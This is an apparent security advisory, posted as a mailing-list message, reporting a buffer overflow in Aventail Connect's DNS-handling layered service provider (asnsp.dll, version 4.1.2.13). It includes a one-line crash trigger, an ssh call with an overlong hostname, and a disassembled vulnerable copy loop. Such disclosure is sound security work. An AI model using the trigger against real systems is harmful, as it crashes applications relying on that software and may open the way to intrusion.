Hello,<br><br>Aventail Connect registers a layered service provider to handle DNS queries.<br>When resolving a hostname the software fails to check string boundaries properly.<br>As the lsp intercepts all ws2_32 dns lookups every application performing these operations is vulnerable.
<br><br>e.g.<br><br>$ ssh $(perl -e &#39;print &quot;a&quot;x2200&#39;)<br>Segmentation fault (core dumped)<br><br>vulnerable copy loop in asnsp.dll:<br><br>18B539F2&nbsp;&nbsp; 41&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; INC ECX<br>18B539F3&nbsp;&nbsp; 41&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; INC ECX
<br>18B539F4&nbsp;&nbsp; 66:85D2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; TEST DX,DX<br>18B539F7&nbsp;&nbsp; 74 0A&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; JE SHORT asnsp.18B53A03<br>18B539F9&nbsp;&nbsp; 66:8B11&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp; MOV DX,WORD PTR DS:[ECX]<br>18B539FC&nbsp;&nbsp; 66:8916&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; MOV WORD PTR DS:[ESI],DX<br>18B539FF&nbsp;&nbsp; 46&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; INC ESI
<br>18B53A00&nbsp;&nbsp; 46&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; INC ESI<br>18B53A01&nbsp; ^EB EF&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; JMP SHORT asnsp.18B539F2<br><br>This was tested on version <a href="http://4.1.2.13">4.1.2.13</a>.<br>vendor: <a href="http://www.aventail.com/">
http://www.aventail.com/</a><br><br>Regards,<br>Thomas Pollet<br><br>